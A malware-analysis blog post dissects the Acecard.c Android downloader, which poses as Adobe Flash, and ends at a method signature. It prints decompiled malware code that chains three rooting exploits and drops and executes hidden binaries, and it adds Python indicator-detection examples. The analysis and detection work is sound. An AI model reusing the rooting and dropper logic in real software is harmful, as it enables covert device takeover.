A few days ago Kaspersky wrote in its blog about the evolution of a banking trojan for Android named Acecard (https://blog.kaspersky.com/acecard-android-trojan/11368/).
Looking deeper in the debugger, I find several interesting strings, but one of them catches my attention: "Executing exploit..." Oh wait! Is this real?!?!
As per Kaspersky's news, it seems that a version of this Trojan has been found in the Google Play store:
"But this is not the only way this malware is distributed. On 28 December 2015, Kaspersky Lab experts were able to spot a version of the Acecard downloader Trojan – Trojan-Downloader.AndroidOS.Acecard.b – in the official Google Play store. The Trojan propagates under the guise of a game. When the malware is installed from Google Play, the user will only see an Adobe Flash Player icon on the desktop screen and no actual sign of the installed application."
The version Kaspersky mentioned is Downloader.AndroidOS.Acecard.b.
However, while doing some research, I found another version named Downloader.AndroidOS.Acecard.c. VirusBulletin already talked about it:
"We discovered a new version of trojan downloader: Trojan-Downloader.AndroidOS.Acecard.c. It is distinguished by the use of a vulnerability in the system after launching the trojan that allows it to obtain superuser permissions. Once equipped with these authorizations, Trojan-Downloader.AndroidOS.Acecard.c can install Acecard banking trojan in the system memory, which protects against the suppression via traditional tools. In addition, another trojan which we already know is spread the same way: it is Trojan-Ransom.AndroidOS.Pletor"
So let's take a look at this specimen.
Dynamic analysis
The APK, once installed, looks like a valid Adobe Flash application.
Looking at the debugging logs and the proxy, the first thing I see is an HTTP connection to the host http://brutalmobiletube.com. In the HTTP request the IMEI of the device is sent, along with other information.

In the file system, there is a configuration file with something really funny: a very self-descriptive variable, ROOTING_TRYED.
Static analysis
The code is really 'awesome', and the authors did not really care at all about being a bit 'stealthy' :)
First, there is a class named "LinuxExploitThread", which is quite self-descriptive.
The method "run" in that "LinuxExploitThread" class invokes several other methods which try to get root access on the device through different exploits:
    public void run()
    {
        try
        {
            // Only one rooting attempt at a time.
            boolean bool = this.semaphore.tryAcquire();
            if (!bool)
                return;
            SharedPreferences localSharedPreferences = this.context.getSharedPreferences("app_settings", 0);
            if (!localSharedPreferences.getBoolean("INSTALL_SENT", false))
                Utils.reportInstall(this.context);
            // Already rooted: go straight to persistence.
            if (Status.haveRoot())
            {
                installPersistent();
                return;
            }
            // Otherwise try each exploit in turn, checking for root after every attempt.
            if (Root.checkFramarootExploitability(this.context))
                runFramalinuxExploit();
            if (Status.haveRoot())
            {
                installPersistent();
                return;
            }
            if (Root.checkSELinuxExploitability(this.context))
                runSelinuxExploit();
            if (Status.haveRoot())
            {
                installPersistent();
                return;
            }
            if (Root.checkTowelExploitability(this.context))
                runTowelExploit();
            if (Status.haveRoot())
                installPersistent();
            while (true)
            {
                return;
                // Decompiler artifact: as rendered, the two statements after 'return' can never
                // execute; the original bytecode evidently does set ROOTING_TRYED, since the
                // flag shows up in the preferences file on disk.
                Utils.putBooleanValue(this.context, "ROOTING_TRYED", true, localSharedPreferences);
                MainService.reconfigure(this.context);
            }
        }
        finally
        {
            this.semaphore.release();
        }
    }
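As an added example (not code from this post or from the malware), here is a small Python check for the two on-device artifacts this run() method leaves behind: the INSTALL_SENT and ROOTING_TRYED booleans in the app's "app_settings" SharedPreferences file, and logcat lines carrying the "selinuxExploitThread" tag used by the Log.d() calls in the runTowelExploit() listing on this page. The preferences XML and the logcat lines are constructed samples; the shared_prefs path and the threadtime logcat layout are standard Android conventions, not taken from the sample.

```python
import xml.etree.ElementTree as ET

# Constructed sample of the app's SharedPreferences file, in the XML layout Android
# uses for /data/data/<package>/shared_prefs/app_settings.xml ("app_settings" is the
# name passed to getSharedPreferences() in run()).
SAMPLE_APP_SETTINGS = """<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <boolean name="INSTALL_SENT" value="true" />
    <boolean name="ROOTING_TRYED" value="true" />
</map>
"""

# Constructed logcat (threadtime format) lines. The "selinuxExploitThread" tag and the
# "(runTowelExploit)" messages are the Log.d() strings from the listing on this page;
# timestamps, PIDs and the ActivityManager line are made up.
SAMPLE_LOGCAT = """01-05 10:12:01.100  1234  1250 D selinuxExploitThread:  (runTowelExploit), executing exploit
01-05 10:12:03.412  1234  1250 D selinuxExploitThread:  (runTowelExploit), execution result: 0
01-05 10:12:03.500  2222  2222 I ActivityManager: Displayed com.example/.Main
"""

EXPLOIT_TAGS = {"selinuxExploitThread"}
ROOT_FLAGS = {"ROOTING_TRYED", "INSTALL_SENT"}

def rooting_flags(prefs_xml: str) -> dict:
    """Return the boolean flags written by run(), e.g. {'ROOTING_TRYED': True}."""
    found = {}
    for el in ET.fromstring(prefs_xml).findall("boolean"):
        if el.get("name") in ROOT_FLAGS:
            found[el.get("name")] = el.get("value") == "true"
    return found

def exploit_log_lines(logcat: str) -> list:
    """Return (tag, message) pairs for logcat lines tagged by the exploit thread."""
    hits = []
    for line in logcat.splitlines():
        parts = line.split(None, 5)  # date time pid tid level "tag: message"
        if len(parts) < 6:
            continue
        tag, _, message = parts[5].partition(":")
        if tag in EXPLOIT_TAGS:
            hits.append((tag, message.strip()))
    return hits

def rooting_attempted(prefs_xml: str, logcat: str) -> bool:
    """True when either artifact shows the exploit chain has been run on the device."""
    return rooting_flags(prefs_xml).get("ROOTING_TRYED", False) or bool(exploit_log_lines(logcat))
```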
Besides the fact that the malware author did not bother to obfuscate the code, or even to give the classes slightly less self-descriptive names, the names of the methods that run the exploits are exactly the same as the vulnerabilities they try to exploit.
The three exploit methods, runFramalinuxExploit(), runSelinuxExploit() and runTowelExploit(), correspond to:
- Framaroot exploit: http://forum.xda-developers.com/apps/framaroot/root-framaroot-one-click-apk-to-root-t2130276
- Towelroot (futex) exploit: http://tinyhack.com/2014/07/07/exploiting-the-futex-bug-and-uncovering-towelroot/
- SELinux exploit: https://www.exploit-db.com/exploits/35711/
The exploit files are part of the APK and are stored in a directory named "assets".

Those files are renamed and used by the different exploits:
    private void runTowelExploit()
    {
        String str1 = this.context.getFilesDir().getAbsolutePath();
        // Bail out if the dropped binary "vs" already exists and is running.
        if ((new AutoFile(str1, "vs").exists()) && (checkSelinuxExecution(str1 + "/" + "vs")))
        {
            Log.d("selinuxExploitThread", " (runTowelExploit) localexploit was already running");
            return;
        }
        try
        {
            // The three assets are dropped into the app's private files directory under new names.
            Utils.dumpAsset(this.context, "ob.data", "vs");
            Utils.dumpAsset(this.context, "jb.data", "qj");
            Utils.dumpAsset(this.context, "sb.data", "ss");
            String str2 = String.format("%s/%s %s/%s %s/%s", new Object[] { str1, "vs", str1, "qj", str1, "ss" });
            Execute.execute("/system/bin/chmod 755 " + str2);
            // Note the reused "selinuxExploitThread" log tag even though this is the Towelroot path.
            Log.d("selinuxExploitThread", " (runTowelExploit), executing exploit");
            int i = Execute.executeSimple(str2).exitCode;
            Log.d("selinuxExploitThread", " (runTowelExploit), execution result: " + i);
            checkSelinuxExecution(str1 + "/" + "vs");
            return;
        }
        catch (Exception localException)
        {
            Log.d("selinuxExploitThread", " (runTowelExploit): Exception : " + localException.getMessage());
            return;
        }
        finally
        {
            // The dropped files are deleted afterwards, so they only exist on disk while the exploit runs.
            new File(str1, "vs").delete();
            new File(str1, "qj").delete();
            new File(str1, "ss").delete();
        }
    }
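The asset names in the "assets" directory and the names they are dropped under (see the Utils.dumpAsset() calls above) are static indicators an analyst can look for without running the sample. The following Python scanner is an added example, not the post's or the malware's code: it builds a constructed stand-in APK (a zip with the three asset names and a fake classes.dex carrying the identifiers from this page) and then scans it for those assets, for an ELF header inside them, and for the class, method, log-tag and preference-key strings seen in the decompiled code.

```python
import io
import zipfile

# Asset names and the names they are dropped under, copied from the Utils.dumpAsset()
# calls in runTowelExploit() above.
EXPLOIT_ASSETS = {"ob.data": "vs", "jb.data": "qj", "sb.data": "ss"}
# Class, method, log-tag and preference-key names seen in the decompiled code on this page.
CODE_STRINGS = [b"LinuxExploitThread", b"runFramalinuxExploit", b"runSelinuxExploit",
                b"runTowelExploit", b"selinuxExploitThread", b"ROOTING_TRYED"]

def build_sample_apk() -> bytes:
    """Constructed stand-in for the sample APK: a zip with the asset names and a fake classes.dex."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for asset in EXPLOIT_ASSETS:
            # Placeholder payload starting with an ELF magic, as a native exploit binary would.
            z.writestr(f"assets/{asset}", b"\x7fELF" + b"\x00" * 16)
        # A real DEX stores identifiers as MUTF-8 in its string table, so a raw byte
        # search finds them; this fake file just carries the strings we look for.
        z.writestr("classes.dex", b"dex\n035\x00" + b"\x00".join(CODE_STRINGS))
        z.writestr("AndroidManifest.xml", b"<manifest/>")
    return buf.getvalue()

def scan_apk(apk_bytes: bytes) -> dict:
    """Return the exploit-related indicators found in an APK (zip) image."""
    findings = {"assets": [], "elf_assets": [], "strings": []}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        names = set(z.namelist())
        for asset in EXPLOIT_ASSETS:
            path = f"assets/{asset}"
            if path in names:
                findings["assets"].append(asset)
                if z.read(path)[:4] == b"\x7fELF":  # native executable hidden in a ".data" asset
                    findings["elf_assets"].append(asset)
        for name in names:
            if name.startswith("classes") and name.endswith(".dex"):
                blob = z.read(name)
                findings["strings"] += [s.decode() for s in CODE_STRINGS if s in blob]
    return findings

def looks_like_acecard_downloader(findings: dict) -> bool:
    """Heuristic verdict: all three exploit assets plus the exploit-thread class name."""
    return len(findings["assets"]) == 3 and "LinuxExploitThread" in findings["strings"]
```

The heuristic is deliberately narrow (exact asset names plus the class name); renamed assets in a later build would need the string list refreshed from that build's decompiled code.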
Once the system is rooted, the trojan is able to install other APKs and remain persistent:
    private boolean installPersistent()